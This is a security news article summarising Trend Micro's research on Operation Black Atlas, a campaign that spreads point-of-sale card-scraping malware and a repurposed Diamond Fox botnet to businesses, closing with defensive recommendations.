Operation Black Atlas, a campaign aimed at infecting point of sale (PoS) systems around the world, has managed to infect more companies and is using the modular Gorynych/Diamond Fox botnet to exfiltrate data, Trend Micro researchers warn.
Earlier this month, the security company revealed that cybercriminals were using multiple tools to compromise businesses that use card payment systems, including those in healthcare and retail, and to infect targeted systems with various PoS malware, including the BlackPOS malware.
Trend Micro said the cybercriminals behind Operation Black Atlas are using a variety of pen testing tools to discover vulnerable systems, including brute force or dictionary attack tools, SMTP (Simple Mail Transfer Protocol) scanners, and remote desktop viewers. They used a “shotgun” approach to infiltrate networks by checking available ports on the Internet on multiple targets at once, the researches said.
The operation was focused on spreading a variety of malware, including BlackPoS, also known as Kaptoxa, while the masterminds behind it were also looking to steal user credentials to sites that contain sensitive information, email accounts, and Facebook. The operation is aimed at small and medium-sized businesses across the globe, and appears to be successfully infecting targets across a variety of industries.
Most recently, the infection spread to a multi-state healthcare provider, dental clinics, a machine manufacturer, a technology company focusing on insurance services, a gas station that has a multi-state presence, and a beauty supply shop, Trend Micro said in a new blog post on the operation.
The security company also explains that the cybercriminals behind Black Atlas introduce PoS threats in the compromised systems by abusing a legitimate function, the Windows Background Intelligent Transfer Service (BITS) or bitsadmin.exe. The function is used for transferring files to and from Microsoft and is mostly used for system updates, as it can easily bypass firewalls.
As part of this operation, bad actors use BITS to download NewPOSThings, a piece of malware that includes functions such as RAM scraper, keylogger, keep-alive reporting, and data transfer routines. Moreover, they load a variant of Neutrino or Kasidet, also with PoS card-scraping functionality, as well as CenterPOS, Project Hook, and PwnPOS in some cases.
The cybercriminals running Black Atlas also managed to build a replica of the Gorynych / Diamond Fox botnet malware and repurposed it to specifically look for the output file of the BlackPoS malware, which includes harvested credit card data. The modular botnet also includes plugins for getting screenshots, passwords, mails, and more.
The security researchers explain that Gorynych routines focus mainly on anti-analysis, information theft, and installations, and that the plugins provide it with increased functionality. The Diamond Fox builder has the keylogger and PoS grabber functionalities disabled by default, but they have been turned on as part of operation Black Atlas.
After infection, Gorynych downloads its plugins and reports to its server via gate.php using HTTP POST, while using its own user-agent that can be found in the configuration file. The information is encrypted using a simple XOR operation, Trend Micro explained. The security researchers also managed to extract hashes, addresses, and other indicators related to Gorynych and included them an IOC document, and offer details on the entire operation Black Atlas in a technical brief.
The security firm notes that companies threatened by this operation should assess their security posture and apply multiple PoS strategies, with network segmentation and isolation of cardholder data environment from other networks considered a standard approach. Large organizations should eliminate unnecessary data and monitor the remaining information, while also ensuring that essential controls are running via regular security checks and that event logs are monitored as well.